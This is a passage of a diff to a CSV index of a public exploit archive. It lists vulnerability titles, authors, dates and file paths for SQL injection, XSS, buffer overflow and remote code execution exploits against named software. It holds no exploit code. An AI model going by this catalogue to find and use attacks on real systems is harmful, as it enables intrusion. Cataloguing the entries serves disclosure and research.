Vulnerability",2004-12-15,"Ariel Berkman",linux,remote,0 24834,platforms/php/webapps/24834.txt,"PhpGedView 2.5/2.6 Calendar.PHP Cross-Site Scripting Vulnerability",2004-01-12,JeiAr,php,webapps,0 24835,platforms/php/webapps/24835.txt,"PhpGedView 2.5/2.6 Placelist.PHP SQL Injection Vulnerability",2004-01-12,JeiAr,php,webapps,0 24836,platforms/cgi/webapps/24836.txt,"UseModWiki 1.0 Wiki.PL Cross-Site Scripting Vulnerability",2004-12-14,"Jeremy Bae",cgi,webapps,0 @@ -21970,16 +22007,13 @@ id,file,description,date,author,platform,type,port 24849,platforms/php/webapps/24849.txt,"DaloRadius - Multiple Vulnerabilities",2013-03-18,"Saadi Siddiqui",php,webapps,0 24850,platforms/php/webapps/24850.txt,"WordPress Simply Poll Plugin 1.4.1 - Multiple Vulnerabilities",2013-03-18,m3tamantra,php,webapps,0 24851,platforms/php/webapps/24851.txt,"Joomla RSfiles Component (cid param) - SQL Injection Vulnerability",2013-03-18,ByEge,php,webapps,0 -24852,platforms/linux/remote/24852.txt,"MPG123 0.59 Find Next File Remote Client-Side Buffer Overflow Vulnerability",2004-12-15,"Bartlomiej Sieka",linux,remote,0 -24853,platforms/linux/remote/24853.c,"MPlayer 0.9/1.0 MMST Get_Header Remote Client-Side Buffer Overflow Vulnerability",2004-12-15,"Ariel Berkman",linux,remote,0 -24854,platforms/php/dos/24854.txt,"PHP 3/4/5 - Multiple Local And Remote Vulnerabilities (1)",2004-12-15,"Stefan Esser",php,dos,0 24855,platforms/php/dos/24855.txt,"PHP 3/4/5 - Multiple Local And Remote Vulnerabilities (2)",2004-12-15,Slythers,php,dos,0 24856,platforms/linux/remote/24856.c,"NapShare 1.2 - Remote Buffer Overflow Vulnerability (1)",2004-12-06,"Bartlomiej Sieka",linux,remote,0 24857,platforms/linux/remote/24857.c,"NapShare 1.2 - Remote Buffer Overflow Vulnerability (2)",2004-12-10,"Bartlomiej Sieka",linux,remote,0 24858,platforms/php/webapps/24858.html,"WordPress Occasions Plugin 1.0.4 - CSRF Vulnerability",2013-03-19,m3tamantra,php,webapps,0 24859,platforms/php/webapps/24859.rb,"WordPress Count per Day Plugin 3.2.5 (counter.php) - XSS Vulnerability",2013-03-19,m3tamantra,php,webapps,0 24860,platforms/hardware/webapps/24860.txt,"Verizon Fios Router MI424WR-GEN3I - CSRF Vulnerability",2013-03-19,"Jacob Holcomb",hardware,webapps,0 -24861,platforms/php/webapps/24861.txt,"Rebus:list (list.php, list_id param) - SQL Injection Vulnerability",2013-03-19,"Robert Cooper",php,webapps,0 +24861,platforms/php/webapps/24861.txt,"Rebus:list (list.php list_id param) - SQL Injection Vulnerability",2013-03-19,"Robert Cooper",php,webapps,0 24862,platforms/php/webapps/24862.txt,"ViewGit 0.0.6 - Multiple XSS Vulnerabilities",2013-03-19,"Matthew R. Bucci",php,webapps,0 24863,platforms/windows/local/24863.html,"EastFTP 4.6.02 - ActiveX Control (0day)",2013-03-20,Dr_IDE,windows,local,0 24864,platforms/hardware/webapps/24864.pl,"StarVedia IPCamera IC502w IC502w+ v020313 - Username/Password Disclosure",2013-03-22,"Todor Donev",hardware,webapps,0 @@ -21988,7 +22022,7 @@ id,file,description,date,author,platform,type,port 24867,platforms/php/webapps/24867.html,"WordPress IndiaNIC FAQs Manager Plugin 1.0 - Multiple Vulnerabilities",2013-03-22,m3tamantra,php,webapps,0 24868,platforms/php/webapps/24868.rb,"WordPress IndiaNIC FAQs Manager Plugin 1.0 - Blind SQL Injection",2013-03-22,m3tamantra,php,webapps,0 24869,platforms/php/webapps/24869.txt,"AContent 1.3 - Local File Inclusion",2013-03-22,DaOne,php,webapps,0 -24870,platforms/php/webapps/24870.txt,"Flatnux CMS 2013-01.17 (index.php, theme param) - Local File Inclusion",2013-03-22,DaOne,php,webapps,0 +24870,platforms/php/webapps/24870.txt,"Flatnux CMS 2013-01.17 (index.php theme param) - Local File Inclusion",2013-03-22,DaOne,php,webapps,0 24871,platforms/php/webapps/24871.txt,"Slash CMS - Multiple Vulnerabilities",2013-03-22,DaOne,php,webapps,0 24872,platforms/windows/local/24872.txt,"Photodex ProShow Gold/Producer 5.0.3310 & 6.0.3410 - ScsiAccess Local Privilege Escalation",2013-03-22,"Julien Ahrens",windows,local,0 24873,platforms/php/webapps/24873.txt,"Stradus CMS 1.0beta4 - Multiple Vulnerabilities",2013-03-22,DaOne,php,webapps,0 @@ -21998,7 +22032,7 @@ id,file,description,date,author,platform,type,port 24877,platforms/php/webapps/24877.txt,"OpenCart 1.5.5.1 (filemanager.php) - Directory Traversal Arbitrary File Access",2013-03-22,waraxe,php,webapps,0 24879,platforms/php/webapps/24879.txt,"Free Hosting Manager 2.0.2 - Multiple SQLi",2013-03-25,"Saadi Siddiqui",php,webapps,0 24880,platforms/windows/dos/24880.pl,"IconCool MP3 WAV Converter 3.00 Build 120518 - Stack Buffer Overflow Vulnerability",2013-03-25,G0li47h,windows,dos,0 -24881,platforms/php/webapps/24881.txt,"ClipShare 4.1.1 (gmembers.php, gid param) - Blind SQL Injection Vulnerability",2013-03-25,Esac,php,webapps,0 +24881,platforms/php/webapps/24881.txt,"ClipShare 4.1.1 (gmembers.php gid param) - Blind SQL Injection Vulnerability",2013-03-25,Esac,php,webapps,0 24882,platforms/php/webapps/24882.pl,"vBulletin 5.0.0 Beta 11 - 5.0.0 Beta 28 - SQL Injection",2013-03-25,"Orestis Kourides",php,webapps,0 24883,platforms/php/webapps/24883.rb,"Ra1NX PHP Bot - pubcall Authentication Bypass Remote Code Execution",2013-03-25,bwall,php,webapps,0 24884,platforms/windows/local/24884.html,"LiquidXML Studio 2012 - ActiveX Insecure Method Executable File Creation (0day)",2013-03-25,Dr_IDE,windows,local,0 @@ -22006,36 +22040,35 @@ id,file,description,date,author,platform,type,port 24886,platforms/windows/remote/24886.html,"Mitsubishi MX ActiveX Component 3 - (ActUWzd.dll (WzTitle)) Remote Exploit",2013-03-25,Dr_IDE,windows,remote,0 24887,platforms/windows/remote/24887.rb,"KingView Log File Parsing Buffer Overflow",2013-03-25,metasploit,windows,remote,0 24888,platforms/linux/remote/24888.rb,"Mutiny Remote Command Execution",2013-03-25,metasploit,linux,remote,0 -24889,platforms/php/webapps/24889.txt,"Wordpress Mathjax Latex Plugin 1.1 - CSRF Vulnerability",2013-03-26,"Junaid Hussain",php,webapps,0 -24890,platforms/windows/remote/24890.rb,"ActFax 5.01 RAW Server Buffer Overflow",2013-03-26,metasploit,windows,remote,0 24891,platforms/windows/remote/24891.rb,"HP Intelligent Management Center Arbitrary File Upload",2013-03-26,metasploit,windows,remote,0 24892,platforms/hardware/remote/24892.txt,"Rosewill RSVA11001 - Remote Command Injection",2013-03-26,"Eric Urban",hardware,remote,0 -24893,platforms/php/webapps/24893.txt,"PsychoStats 3.2.2b (awards.php, id param) - Blind SQL Injection",2013-03-27,"Mohamed from ALG",php,webapps,0 +24893,platforms/php/webapps/24893.txt,"PsychoStats 3.2.2b (awards.php id param) - Blind SQL Injection",2013-03-27,"Mohamed from ALG",php,webapps,0 24894,platforms/php/webapps/24894.txt,"ClipShare 4.1.1 - Multiples Vulnerabilites",2013-03-27,Esac,php,webapps,0 24896,platforms/hardware/dos/24896.sh,"Konftel 300IP SIP-based Conference Phone <= 2.1.2 - Remote Bypass Reboot",2013-03-29,"Todor Donev",hardware,dos,0 24897,platforms/windows/remote/24897.rb,"KNet Web Server 1.04b - Buffer Overflow SEH",2013-03-29,"Myo Soe",windows,remote,0 -24898,platforms/php/webapps/24898.txt,"SynConnect Pms (index.php, loginid param) - SQL Injection Vulnerability",2013-03-29,"Bhadresh Patel",php,webapps,0 +24898,platforms/php/webapps/24898.txt,"SynConnect Pms (index.php loginid param) - SQL Injection Vulnerability",2013-03-29,"Bhadresh Patel",php,webapps,0 24899,platforms/hardware/local/24899.txt,"Draytek Vigor 3900 1.06 - Privilege Escalation",2013-03-29,"Mohammad abou hayt",hardware,local,0 +24943,platforms/windows/remote/24943.py,"BigAnt Server 2.97 - DDNF Username Buffer Overflow",2013-04-10,"Craig Freyman",windows,remote,0 +24955,platforms/linux/remote/24955.rb,"Nagios Remote Plugin Executor Arbitrary Command Execution",2013-04-12,metasploit,linux,remote,5666 +24917,platforms/windows/dos/24917.py,"Easy DVD Player 3.5.1 - (libav) libavcodec_plugin.dll DoS",2013-04-05,metacom,windows,dos,0 24901,platforms/windows/webapps/24901.txt,"MailOrderWorks 5.907 - Multiple Vulnerabilities",2013-03-29,Vulnerability-Lab,windows,webapps,0 24902,platforms/php/remote/24902.rb,"STUNSHELL Web Shell Remote PHP Code Execution",2013-03-29,metasploit,php,remote,0 24903,platforms/php/remote/24903.rb,"STUNSHELL Web Shell Remote Code Execution",2013-03-29,metasploit,php,remote,0 24904,platforms/windows/remote/24904.rb,"Java CMM Remote Code Execution",2013-03-29,metasploit,windows,remote,0 24905,platforms/multiple/remote/24905.rb,"v0pCr3w Web Shell - Remote Code Execution",2013-03-29,metasploit,multiple,remote,0 -24906,platforms/php/webapps/24906.txt,"AWS Xms 2.5 - (importer.php, what param) Directory Traversal Vulnerability",2013-03-29,"High-Tech Bridge SA",php,webapps,0 +24906,platforms/php/webapps/24906.txt,"AWS Xms 2.5 - (importer.php what param) Directory Traversal Vulnerability",2013-03-29,"High-Tech Bridge SA",php,webapps,0 24907,platforms/windows/remote/24907.txt,"McAfee Virtual Technician (MVT) 6.5.0.2101 - Insecure ActiveX Method",2013-03-29,"High-Tech Bridge SA",windows,remote,0 -24910,platforms/windows/local/24910.txt,"VirtualDJ Pro/Home <= 7.3 - Buffer Overflow Vulnerability",2013-04-02,"Alexandro Snchez Bach",windows,local,0 -24911,platforms/php/webapps/24911.txt,"Pollen CMS 0.6 (index.php, p param) - Local File Disclosure",2013-04-02,MizoZ,php,webapps,0 +24918,platforms/windows/dos/24918.py,"Personal File Share 1.0 DoS",2013-04-05,npn,windows,dos,0 +24910,platforms/windows/local/24910.txt,"VirtualDJ Pro/Home <= 7.3 - Buffer Overflow Vulnerability",2013-04-02,"Alexandro Sánchez Bach",windows,local,0 +24911,platforms/php/webapps/24911.txt,"Pollen CMS 0.6 (index.php p param) - Local File Disclosure",2013-04-02,MizoZ,php,webapps,0 24913,platforms/php/webapps/24913.txt,"Network Weathermap 0.97a (editor.php) - Persistent XSS",2013-04-02,"Daniel Ricardo dos Santos",php,webapps,0 24914,platforms/php/webapps/24914.txt,"Wordpress FuneralPress Plugin 1.1.6 - Persistent XSS",2013-04-02,"Rob Armstrong",php,webapps,0 24915,platforms/multiple/webapps/24915.txt,"Aspen 0.8 - Directory Traversal",2013-04-02,"Daniel Ricardo dos Santos",multiple,webapps,0 24916,platforms/hardware/webapps/24916.txt,"Netgear WNR1000 - Authentication Bypass",2013-04-02,"Roberto Paleari",hardware,webapps,0 -24917,platforms/windows/dos/24917.py,"Easy DVD Player 3.5.1 - (libav) libavcodec_plugin.dll DoS",2013-04-05,metacom,windows,dos,0 -24918,platforms/windows/dos/24918.py,"Personal File Share 1.0 DoS",2013-04-05,npn,windows,dos,0 24919,platforms/windows/local/24919.py,"HexChat 2.9.4 - Local Exploit",2013-04-07,"Matt Andreko",windows,local,0 -24921,platforms/php/webapps/24921.txt,"OpenCart - Change User Password CSRF Vulnerability",2013-04-08,"Saadi Siddiqui",php,webapps,0 -24922,platforms/multiple/webapps/24922.txt,"OTRS FAQ Module - Persistent XSS",2013-04-08,"Luigi Vezzoso",multiple,webapps,0 24923,platforms/multiple/local/24923.txt,"Google AD Sync Tool - Exposure of Sensitive Information Vulnerability",2013-04-08,"Sense of Security",multiple,local,0 24924,platforms/hardware/webapps/24924.txt,"Belkin Wemo - Arbitrary Firmware Upload",2013-04-08,"Daniel Buentello",hardware,webapps,0 +24940,platforms/windows/dos/24940.rb,"Sysax Multi Server 6.10 - SSH Denial of Service",2013-04-09,"Matt Andreko",windows,dos,0 24926,platforms/hardware/webapps/24926.txt,"Multiple D-Link Devices - Multiple Vulnerabilities",2013-04-08,m-1-k-3,hardware,webapps,0 24927,platforms/php/webapps/24927.txt,"Vanilla Forums 2-0-18-4 - SQL-Injection Vulnerability",2013-04-08,bl4ckw0rm,php,webapps,0 24928,platforms/hardware/webapps/24928.txt,"TP-Link TD-8817 6.0.1 Build 111128 Rel.26763 - CSRF Vulnerability",2013-04-08,Un0wn_X,hardware,webapps,0 @@ -22044,26 +22077,31 @@ id,file,description,date,author,platform,type,port 24931,platforms/hardware/remote/24931.rb,"Netgear DGN1000B setup.cgi Remote Command Execution",2013-04-08,metasploit,hardware,remote,0 24932,platforms/linux/webapps/24932.txt,"Sophos Web Protection Appliance 3.7.8.1 - Multiple Vulnerabilities",2013-04-08,"SEC Consult",linux,webapps,0 24933,platforms/linux/local/24933.txt,"PonyOS 0.4.99-mlp - Multiple Vulnerabilities",2013-04-08,"John Cartwright",linux,local,0 -24934,platforms/php/webapps/24934.txt,"WHMCS Group Pay Plugin 1.5 (grouppay.php, hash param) - SQL Injection",2013-04-08,"HJauditing Employee Tim",php,webapps,0 +24934,platforms/php/webapps/24934.txt,"WHMCS Group Pay Plugin 1.5 (grouppay.php hash param) - SQL Injection",2013-04-08,"HJauditing Employee Tim",php,webapps,0 24935,platforms/linux/remote/24935.rb,"MongoDB nativeHelper.apply Remote Code Execution",2013-04-08,metasploit,linux,remote,0 24936,platforms/hardware/remote/24936.rb,"Linksys E1500/E2500 apply.cgi Remote Command Injection",2013-04-08,metasploit,hardware,remote,0 24937,platforms/linux/remote/24937.rb,"HP System Management Anonymous Access Code Execution",2013-04-08,metasploit,linux,remote,0 24938,platforms/multiple/remote/24938.rb,"Novell ZENworks Configuration Management Remote Execution",2013-04-08,metasploit,multiple,remote,0 -24940,platforms/windows/dos/24940.rb,"Sysax Multi Server 6.10 - SSH Denial of Service",2013-04-09,"Matt Andreko",windows,dos,0 +27433,platforms/windows/dos/27433.txt,"Microsoft Internet Explorer 5.0.1 Script Action Handler Buffer Overflow Vulnerability",2006-03-16,"Michal Zalewski",windows,dos,0 +24957,platforms/php/webapps/24957.txt,"Vanilla Forums Van2Shout Plugin 1.0.51 - Multiple CSRF Vulnerabilities",2013-04-15,"Henry Hoggard",php,webapps,0 +24950,platforms/windows/remote/24950.pl,"KNet Web Server 1.04b - Stack Corruption BoF",2013-04-12,Wireghoul,windows,remote,0 +24968,platforms/windows/dos/24968.rb,"Mikrotik Syslog Server for Windows 1.15 - Denial of Service",2013-04-22,xis_one,windows,dos,514 +24969,platforms/php/webapps/24969.txt,"CiviCRM for Joomla 4.2.2 - Remote Code Injection",2013-04-22,iskorpitx,php,webapps,0 24942,platforms/php/webapps/24942.txt,"ZAPms 1.41- SQL Injection Vulnerability",2013-04-09,NoGe,php,webapps,0 -24943,platforms/windows/remote/24943.py,"BigAnt Server 2.97 - DDNF Username Buffer Overflow",2013-04-10,"Craig Freyman",windows,remote,0 +643,platforms/windows/remote/643.c,"SLMail 5.5 - POP3 PASS Remote Buffer Overflow Exploit",2004-12-21,"Haroon Rashid Astwat",windows,remote,0 +646,platforms/windows/remote/646.c,"SLMail 5.5 - Remote Buffer Overflow Exploit",2004-12-22,"Ivan Ivanovic",windows,remote,0 24944,platforms/windows/remote/24944.py,"FreeFloat FTP 1.0 - DEP Bypass with ROP",2013-04-10,negux,windows,remote,0 24945,platforms/hardware/remote/24945.rb,"Linksys WRT54GL apply.cgi Command Execution",2013-04-10,metasploit,hardware,remote,0 24946,platforms/multiple/remote/24946.rb,"Adobe ColdFusion APSB13-03 - Remote Exploit",2013-04-10,metasploit,multiple,remote,0 24947,platforms/linux/remote/24947.txt,"MongoDB 2.2.3 - nativeHelper.apply Remote Code Execution",2013-04-08,agixid,linux,remote,0 -24950,platforms/windows/remote/24950.pl,"KNet Web Server 1.04b - Stack Corruption BoF",2013-04-12,Wireghoul,windows,remote,0 +27434,platforms/php/webapps/27434.txt,"Oxynews Index.PHP SQL Injection Vulnerability",2006-03-16,R00T3RR0R,php,webapps,0 +27435,platforms/php/webapps/27435.txt,"PHPMyAdmin 2.8.1 Set_Theme Cross-Site Scripting Vulnerability",2006-03-16,"Ali Asad",php,webapps,0 +27436,platforms/php/webapps/27436.txt,"Invision Power Services Invision Board 2.0.4 - Search Action Multiple Parameter XSS",2006-03-17,Mr.SNAKE,php,webapps,0 24951,platforms/linux/dos/24951.pl,"ircd-hybrid 8.0.5 - Denial of Service",2013-04-12,kingcope,linux,dos,0 24952,platforms/windows/dos/24952.py,"AT-TFTP Server 2.0 - Stack Based Buffer Overflow DoS",2013-04-12,xis_one,windows,dos,69 24953,platforms/php/webapps/24953.txt,"Free Monthly Websites 2.0 - Admin Password Change",2013-04-12,"Yassin Aboukir",php,webapps,0 24954,platforms/php/webapps/24954.txt,"Simple HRM System <= 2.3 - Multiple Vulnerabilities",2013-04-12,Doraemon,php,webapps,0 -24955,platforms/linux/remote/24955.rb,"Nagios Remote Plugin Executor Arbitrary Command Execution",2013-04-12,metasploit,linux,remote,5666 24956,platforms/hardware/remote/24956.rb,"DLink DIR-645 / DIR-815 diagnostic.php Command Execution",2013-04-12,metasploit,hardware,remote,0 -24957,platforms/php/webapps/24957.txt,"Vanilla Forums Van2Shout Plugin 1.0.51 - Multiple CSRF Vulnerabilities",2013-04-15,"Henry Hoggard",php,webapps,0 24958,platforms/windows/remote/24958.py,"MinaliC Webserver 2.0.0 - Buffer Overflow",2013-04-15,superkojiman,windows,remote,0 24959,platforms/php/webapps/24959.txt,"CMSLogik 1.2.1 - Multiple Vulnerabilities",2013-04-15,LiquidWorm,php,webapps,0 24960,platforms/php/webapps/24960.txt,"phpVms Virtual Airline Administration 2.1.934 & 2.1.935 - SQL Injection Vulnerability",2013-04-15,NoGe,php,webapps,0 @@ -22074,15 +22112,17 @@ id,file,description,date,author,platform,type,port 24965,platforms/php/webapps/24965.txt,"KrisonAV CMS 3.0.1 - Multiple Vulnerabilities",2013-04-18,"High-Tech Bridge SA",php,webapps,0 24966,platforms/windows/dos/24966.txt,"Java Web Start Launcher ActiveX Control - Memory Corruption",2013-04-18,"SEC Consult",windows,dos,0 24967,platforms/multiple/webapps/24967.txt,"nginx 0.6.x - Arbitrary Code Execution NullByte Injection",2013-04-19,"Neal Poole",multiple,webapps,0 -24968,platforms/windows/dos/24968.rb,"Mikrotik Syslog Server for Windows 1.15 - Denial of Service",2013-04-22,xis_one,windows,dos,514 -24969,platforms/php/webapps/24969.txt,"CiviCRM for Joomla 4.2.2 - Remote Code Injection",2013-04-22,iskorpitx,php,webapps,0 -24972,platforms/windows/dos/24972.c,"Flightgear 2.0, 2.4 - Remote Format String Exploit",2013-04-22,Kurono,windows,dos,0 +25090,platforms/php/webapps/25090.txt,"XGB 2.0 - Authentication Bypass Vulnerability",2005-02-08,"Albania Security Clan",php,webapps,0 +25091,platforms/multiple/remote/25091.txt,"realnetworks realarcade 1.2.0.994 - Multiple Vulnerabilities",2005-02-08,"Luigi Auriemma",multiple,remote,0 +25816,platforms/php/webapps/25816.txt,"Ovidentia FX Remote File Include Vulnerability",2005-06-10,Status-x,php,webapps,0 +25817,platforms/cgi/webapps/25817.txt,"JamMail 1.8 Jammail.pl Remote Arbitrary Command Execution Vulnerability",2005-06-12,blahplok,cgi,webapps,0 +25818,platforms/php/webapps/25818.txt,"Singapore 0.9.11 beta Image Gallery Index.PHP Cross-Site Scripting Vulnerability",2005-06-13,TheGreatOne2176,php,webapps,0 +24972,platforms/windows/dos/24972.c,"Flightgear 2.0_ 2.4 - Remote Format String Exploit",2013-04-22,Kurono,windows,dos,0 24973,platforms/php/webapps/24973.txt,"VoipNow <= 2.5 - Local File Inclusion Vulnerability",2013-04-22,i-Hmx,php,webapps,0 24974,platforms/hardware/remote/24974.rb,"Netgear DGN2200B pppoe.cgi Remote Command Execution",2013-04-22,metasploit,hardware,remote,0 24975,platforms/hardware/webapps/24975.txt,"D'Link DIR-615 Hardware rev D3 / DIR-300 - Hardware rev A - Multiple Vulnerabilities",2013-04-23,m-1-k-3,hardware,webapps,0 24976,platforms/multiple/remote/24976.rb,"Java Applet Reflection Type Confusion Remote Code Execution",2013-04-23,metasploit,multiple,remote,0 -24977,platforms/linux/remote/24977.txt,"CUPS 1.1.x - HPGL File Processor Buffer Overflow Vulnerability",2004-12-15,"Ariel Berkman",linux,remote,0 -24978,platforms/linux/remote/24978.txt,"Xine-Lib 0.9/1 - Remote Client-Side Buffer Overflow Vulnerability",2004-12-16,"Ariel Berkman",linux,remote,0 +25089,platforms/php/webapps/25089.txt,"PHP-Fusion 4.0 Viewthread.PHP Information Disclosure Vulnerbility",2005-02-08,TheGreatOne2176,php,webapps,0 24979,platforms/multiple/remote/24979.txt,"XLReader 0.9 - Remote Client-Side Buffer Overflow Vulnerability",2004-12-16,"Kris Kubicki",multiple,remote,0 24980,platforms/multiple/remote/24980.txt,"Yanf 0.4 HTTP Response Buffer Overflow Vulnerability",2004-12-15,"Ariel Berkman",multiple,remote,0 24981,platforms/multiple/remote/24981.txt,"JPegToAvi 1.5 File List Buffer Overflow Vulnerability",2004-12-15,"James Longstreet",multiple,remote,0 @@ -22101,7 +22141,21 @@ id,file,description,date,author,platform,type,port 24994,platforms/php/webapps/24994.txt,"MediaWiki 1.3.x - Remote Arbitrary Script Upload Vulnerability",2004-12-16,"Jeremy Bae",php,webapps,0 24995,platforms/multiple/remote/24995.txt,"DXFScope 0.2 - Remote Client-Side Buffer Overflow Vulnerability",2004-12-16,"Ariel Berkman",multiple,remote,0 24996,platforms/windows/remote/24996.rb,"SAP ConfigServlet Remote Unauthenticated Payload Execution",2013-04-25,"Andras Kabai",windows,remote,0 +25184,platforms/php/webapps/25184.txt,"ProjectBB 0.4.5.1 - Multiple SQL Injection Vulnerabilities",2005-03-02,"benji lemien",php,webapps,0 +25185,platforms/php/webapps/25185.txt,"D-Forum 1.11 Nav.PHP3 - Cross-Site Scripting Vulnerability",2005-03-03,benjilenoob,php,webapps,0 +25186,platforms/php/webapps/25186.txt,"Typo3 CMW_Linklist 1.4.1 Extension SQL Injection Vulnerability",2005-03-03,"Fabian Becker",php,webapps,0 +25187,platforms/windows/remote/25187.txt,"Computalynx CProxy 3.3/3.4.x - Directory Traversal Vulnerability",2005-03-03,"Kristof Philipsen",windows,remote,0 +25188,platforms/windows/remote/25188.txt,"Opera 7.x_ Firefox 1.0_ Internet Explorer 6.0 Information Disclosure Weakness",2005-02-19,upken,windows,remote,0 +25189,platforms/php/webapps/25189.txt,"Stadtaus.Com Download Center Lite 1.5 - Arbitrary Remote PHP File Include Vulnerability",2005-03-04,"Filip Groszynski",php,webapps,0 +25190,platforms/multiple/remote/25190.txt,"ca3de Multiple Vulnerabilities",2005-03-03,"Luigi Auriemma",multiple,remote,0 +25191,platforms/multiple/remote/25191.txt,"JoWood Chaser 1.0/1.50 - Remote Buffer Overflow Vulnerability",2005-03-07,"Luigi Auriemma",multiple,remote,0 +25192,platforms/php/webapps/25192.pl,"Stadtaus.Com PHP Form Mail Script 2.3 - Remote File Include Vulnerability",2005-03-05,mozako,php,webapps,0 +25193,platforms/php/webapps/25193.txt,"Jason Hines PHPWebLog 0.4/0.5 - Remote File Include Vulnerability",2005-03-07,"Filip Groszynski",php,webapps,0 +25194,platforms/windows/remote/25194.txt,"Hosting Controller 1.x/6.1 - Multiple Information Disclosure Vulnerabilities",2005-03-07,"small mouse",windows,remote,0 +29277,platforms/windows/remote/29277.txt,"winamp Web interface 7.5.13 - Multiple Vulnerabilities",2006-12-11,"Luigi Auriemma",windows,remote,0 +29278,platforms/php/webapps/29278.pl,"Work System ECommerce 3.0.3/3.0.4 Forum.PHP Remote File Include Vulnerability",2006-12-13,the_Edit0r,php,webapps,0 24999,platforms/windows/remote/24999.py,"Windows Light HTTPD 0.1 - Buffer Overflow",2013-04-25,"Jacob Holcomb",windows,remote,0 +25294,platforms/windows/remote/25294.rb,"Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability",2013-05-07,metasploit,windows,remote,0 25001,platforms/linux/remote/25001.rb,"GroundWork monarch_scan.cgi OS Command Injection",2013-04-25,metasploit,linux,remote,0 25002,platforms/php/webapps/25002.txt,"Hornbill Supportworks ITSM 1.0.0 - SQL Injection Vulnerability",2013-04-25,"Joseph Sheridan",php,webapps,0 25003,platforms/php/webapps/25003.txt,"phpMyAdmin 3.5.8 and 4.0.0-RC2 - Multiple Vulnerabilities",2013-04-25,waraxe,php,webapps,0 @@ -22125,6 +22179,7 @@ id,file,description,date,author,platform,type,port 25021,platforms/windows/remote/25021.txt,"ABCPP 1.3 Directive Handler Buffer Overflow Vulnerability",2004-12-15,"Yosef Klein",windows,remote,0 25022,platforms/windows/remote/25022.txt,"Jef Moine abcm2ps 3.7.20 ABC File Remote Buffer Overflow Vulnerability",2004-12-15,"Limin Wang",windows,remote,0 25023,platforms/windows/remote/25023.txt,"PGN2WEB 0.3 - Buffer Overflow Vulnerability",2004-12-15,"Tom Palarz",windows,remote,0 +25183,platforms/php/webapps/25183.txt,"ProjectBB 0.4.5.1 - Multiple Remote Cross-Site Scripting Vulnerabilities",2005-03-02,"benji lemien",php,webapps,0 25024,platforms/hardware/webapps/25024.txt,"D-Link DIR-635 - Multiple Vulnerabilities",2013-04-26,m-1-k-3,hardware,webapps,0 25025,platforms/windows/remote/25025.txt,"ABC2PS/JCABC2PS 1.2 Voice Field Buffer Overflow Vulnerability",2004-12-15,"Tom Palarz",windows,remote,0 25026,platforms/windows/remote/25026.txt,"Mesh Viewer 0.2.2 - Buffer Overflow Vulnerability",2004-12-15,"Mohammed Khan",windows,remote,0 @@ -22190,9 +22245,6 @@ id,file,description,date,author,platform,type,port 25086,platforms/windows/webapps/25086.pl,"Ipswitch IMail 11.01 - XSS Vulnerability",2013-04-29,DaOne,windows,webapps,0 25087,platforms/php/webapps/25087.txt,"Joomla! <= 3.0.3 (remember.php) - PHP Object Injection Vulnerability",2013-04-26,EgiX,php,webapps,0 25088,platforms/php/webapps/25088.txt,"Foe CMS 1.6.5 - Multiple Vulnerabilities",2013-04-29,flux77,php,webapps,0 -25089,platforms/php/webapps/25089.txt,"PHP-Fusion 4.0 Viewthread.PHP Information Disclosure Vulnerbility",2005-02-08,TheGreatOne2176,php,webapps,0 -25090,platforms/php/webapps/25090.txt,"XGB 2.0 - Authentication Bypass Vulnerability",2005-02-08,"Albania Security Clan",php,webapps,0 -25091,platforms/multiple/remote/25091.txt,"realnetworks realarcade 1.2.0.994 - Multiple Vulnerabilities",2005-02-08,"Luigi Auriemma",multiple,remote,0 25092,platforms/windows/remote/25092.txt,"Software602 602 Lan Suite 2004 2004.0.04.1221 - Arbitrary File Upload Vulnerability",2005-02-08,"Tan Chew Keong",windows,remote,0 25093,platforms/php/webapps/25093.txt,"MercuryBoard 1.1 INDEX.PHP SQL Injection Vulnerability",2005-02-09,Zeelock,php,webapps,0 25094,platforms/windows/remote/25094.c,"MSN Messenger 6.2.0137 PNG Buffer Overflow Vulnerability",2005-02-08,ATmaCA,windows,remote,0 @@ -22284,18 +22336,6 @@ id,file,description,date,author,platform,type,port 25180,platforms/php/webapps/25180.py,"PHPNews 1.2.3/1.2.4 - Auth.PHP Remote File Include Vulnerability",2005-03-01,mozako,php,webapps,0 25181,platforms/windows/remote/25181.py,"Cerulean Studios Trillian 3.0 - Remote PNG Image File Parsing Buffer Overflow Vulnerability",2005-03-02,"Tal Zeltzer",windows,remote,0 25182,platforms/php/webapps/25182.txt,"auraCMS 1.5 - Multiple Cross-Site Scripting Vulnerabilities",2005-03-02,"echo staff",php,webapps,0 -25183,platforms/php/webapps/25183.txt,"ProjectBB 0.4.5.1 - Multiple Remote Cross-Site Scripting Vulnerabilities",2005-03-02,"benji lemien",php,webapps,0 -25184,platforms/php/webapps/25184.txt,"ProjectBB 0.4.5.1 - Multiple SQL Injection Vulnerabilities",2005-03-02,"benji lemien",php,webapps,0 -25185,platforms/php/webapps/25185.txt,"D-Forum 1.11 Nav.PHP3 - Cross-Site Scripting Vulnerability",2005-03-03,benjilenoob,php,webapps,0 -25186,platforms/php/webapps/25186.txt,"Typo3 CMW_Linklist 1.4.1 Extension SQL Injection Vulnerability",2005-03-03,"Fabian Becker",php,webapps,0 -25187,platforms/windows/remote/25187.txt,"Computalynx CProxy 3.3/3.4.x - Directory Traversal Vulnerability",2005-03-03,"Kristof Philipsen",windows,remote,0 -25188,platforms/windows/remote/25188.txt,"Opera 7.x, Firefox 1.0, Internet Explorer 6.0 Information Disclosure Weakness",2005-02-19,upken,windows,remote,0 -25189,platforms/php/webapps/25189.txt,"Stadtaus.Com Download Center Lite 1.5 - Arbitrary Remote PHP File Include Vulnerability",2005-03-04,"Filip Groszynski",php,webapps,0 -25190,platforms/multiple/remote/25190.txt,"ca3de Multiple Vulnerabilities",2005-03-03,"Luigi Auriemma",multiple,remote,0 -25191,platforms/multiple/remote/25191.txt,"JoWood Chaser 1.0/1.50 - Remote Buffer Overflow Vulnerability",2005-03-07,"Luigi Auriemma",multiple,remote,0 -25192,platforms/php/webapps/25192.pl,"Stadtaus.Com PHP Form Mail Script 2.3 - Remote File Include Vulnerability",2005-03-05,mozako,php,webapps,0 -25193,platforms/php/webapps/25193.txt,"Jason Hines PHPWebLog 0.4/0.5 - Remote File Include Vulnerability",2005-03-07,"Filip Groszynski",php,webapps,0 -25194,platforms/windows/remote/25194.txt,"Hosting Controller 1.x/6.1 - Multiple Information Disclosure Vulnerabilities",2005-03-07,"small mouse",windows,remote,0 25195,platforms/windows/remote/25195.txt,"Oracle Database 8i/9i Multiple Remote Directory Traversal Vulnerabilities",2005-03-07,"Cesar Cerrudo",windows,remote,0 25196,platforms/windows/remote/25196.txt,"Yahoo! Messenger 5.x/6.0 Offline Mode Status 